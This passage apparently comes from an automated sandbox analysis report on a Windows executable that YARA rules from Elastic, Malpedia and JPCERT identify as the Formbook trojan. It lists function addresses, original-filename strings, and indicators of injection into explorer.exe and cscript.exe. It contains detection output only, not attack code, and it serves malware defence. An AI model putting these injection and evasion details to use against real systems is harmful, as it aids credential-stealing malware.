              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01093FD53_2_01093FD5
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_010D9EB03_2_010D9EB0
              Source: C:\Windows\explorer.exeCode function: 4_2_0E0542324_2_0E054232
              Source: C:\Windows\explorer.exeCode function: 4_2_0E04EB304_2_0E04EB30
              Source: C:\Windows\explorer.exeCode function: 4_2_0E04EB324_2_0E04EB32
              Source: C:\Windows\explorer.exeCode function: 4_2_0E0530364_2_0E053036
              Source: C:\Windows\explorer.exeCode function: 4_2_0E04A0824_2_0E04A082
              Source: C:\Windows\explorer.exeCode function: 4_2_0E04BD024_2_0E04BD02
              Source: C:\Windows\explorer.exeCode function: 4_2_0E0519124_2_0E051912
              Source: C:\Windows\explorer.exeCode function: 4_2_0E0575CD4_2_0E0575CD
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB12324_2_10EB1232
              Source: C:\Windows\explorer.exeCode function: 4_2_10EA70824_2_10EA7082
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB00364_2_10EB0036
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB45CD4_2_10EB45CD
              Source: C:\Windows\explorer.exeCode function: 4_2_10EABB324_2_10EABB32
              Source: C:\Windows\explorer.exeCode function: 4_2_10EABB304_2_10EABB30
              Source: C:\Windows\explorer.exeCode function: 4_2_10EA8D024_2_10EA8D02
              Source: C:\Windows\explorer.exeCode function: 4_2_10EAE9124_2_10EAE912
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_006271105_2_00627110
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C4E4F65_2_04C4E4F6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C524465_2_04C52446
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C444205_2_04C44420
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C605915_2_04C60591
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA05355_2_04BA0535
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBC6E05_2_04BBC6E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B9C7C05_2_04B9C7C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA07705_2_04BA0770
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BC47505_2_04BC4750
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C320005_2_04C32000
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C581CC5_2_04C581CC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C541A25_2_04C541A2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C601AA5_2_04C601AA
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C281585_2_04C28158
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B901005_2_04B90100
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3A1185_2_04C3A118
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C202C05_2_04C202C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C402745_2_04C40274
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C603E65_2_04C603E6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BAE3F05_2_04BAE3F0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5A3525_2_04C5A352
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B90CF25_2_04B90CF2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C40CB55_2_04C40CB5
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA0C005_2_04BA0C00
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BB8DBF5_2_04BB8DBF
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B9ADE05_2_04B9ADE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BAAD005_2_04BAAD00
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3CD1F5_2_04C3CD1F
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5EEDB5_2_04C5EEDB
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BB2E905_2_04BB2E90
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5CE935_2_04C5CE93
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5EE265_2_04C5EE26
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA0E595_2_04BA0E59
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BACFE05_2_04BACFE0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C1EFA05_2_04C1EFA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B92FC85_2_04B92FC8
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C14F405_2_04C14F40
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BC0F305_2_04BC0F30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE2F285_2_04BE2F28
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C42F305_2_04C42F30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B868B85_2_04B868B8
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BCE8F05_2_04BCE8F0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BAA8405_2_04BAA840
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA28405_2_04BA2840
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA29A05_2_04BA29A0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C6A9A65_2_04C6A9A6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BB69625_2_04BB6962
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B9EA805_2_04B9EA80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C56BD75_2_04C56BD7
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5AB405_2_04C5AB40
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B914605_2_04B91460
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F43F5_2_04C5F43F
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C695C35_2_04C695C3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3D5B05_2_04C3D5B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C575715_2_04C57571
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C516CC5_2_04C516CC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE56305_2_04BE5630
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F7B05_2_04C5F7B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C4F0CC5_2_04C4F0CC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5F0E05_2_04C5F0E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C570E95_2_04C570E9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA70C05_2_04BA70C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BAB1B05_2_04BAB1B0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C6B16B5_2_04C6B16B
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B8F1725_2_04B8F172
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BD516C5_2_04BD516C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA52A05_2_04BA52A0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C412ED5_2_04C412ED
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBB2C05_2_04BBB2C0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE739A5_2_04BE739A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5132D5_2_04C5132D
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B8D34C5_2_04B8D34C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FCF25_2_04C5FCF2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C19C325_2_04C19C32
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBFDC05_2_04BBFDC0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C51D5A5_2_04C51D5A
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C57D735_2_04C57D73
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA3D405_2_04BA3D40
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA9EB05_2_04BA9EB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA1F925_2_04BA1F92
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B63FD55_2_04B63FD5
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04B63FD25_2_04B63FD2
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FFB15_2_04C5FFB1
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FF095_2_04C5FF09
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA38E05_2_04BA38E0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C0D8005_2_04C0D800
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C359105_2_04C35910
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BA99505_2_04BA9950
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBB9505_2_04BBB950
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C4DAC65_2_04C4DAC6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BE5AA05_2_04BE5AA0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C41AA35_2_04C41AA3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C3DAAC5_2_04C3DAAC
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C57A465_2_04C57A46
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FA495_2_04C5FA49
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C13A6C5_2_04C13A6C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C15BF05_2_04C15BF0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BBFB805_2_04BBFB80
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04BDDBF95_2_04BDDBF9
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04C5FB765_2_04C5FB76
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CE5585_2_027CE558
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD5A65_2_027CD5A6
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD8A35_2_027CD8A3
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027CD99C5_2_027CD99C
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B9E505_2_027B9E50
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B9E4D5_2_027B9E4D
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B2FB05_2_027B2FB0
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_027B2D905_2_027B2D90
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4A0365_2_04A4A036
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4E5CD5_2_04A4E5CD
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A42D025_2_04A42D02
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A410825_2_04A41082
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A489125_2_04A48912
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A4B2325_2_04A4B232
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A45B305_2_04A45B30
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04A45B325_2_04A45B32
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: String function: 0114F290 appears 105 times
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: String function: 010BB970 appears 280 times
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: String function: 01105130 appears 58 times
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: String function: 01117E54 appears 111 times
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: String function: 0113EA12 appears 86 times
              Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C1F290 appears 105 times
              Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04BD5130 appears 58 times
              Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04BE7E54 appears 111 times
              Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04B8B970 appears 280 times
              Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 04C0EA12 appears 86 times
              Source: AB2hQJZ77ipdWem.exeBinary or memory string: OriginalFilename vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1388754633.00000000042EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1387280607.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000000.00000002.1391961489.0000000007850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exeBinary or memory string: OriginalFilenamePGgp.exe6 vs AB2hQJZ77ipdWem.exe
              Source: AB2hQJZ77ipdWem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: cscript.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: AB2hQJZ77ipdWem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.AB2hQJZ77ipdWem.exe.5a20000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, fQsIIlXm3Yrb2eUDWF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, fQsIIlXm3Yrb2eUDWF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, fQsIIlXm3Yrb2eUDWF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.AB2hQJZ77ipdWem.exe.318c9d8.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.AB2hQJZ77ipdWem.exe.7830000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.AB2hQJZ77ipdWem.exe.31ad0d4.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
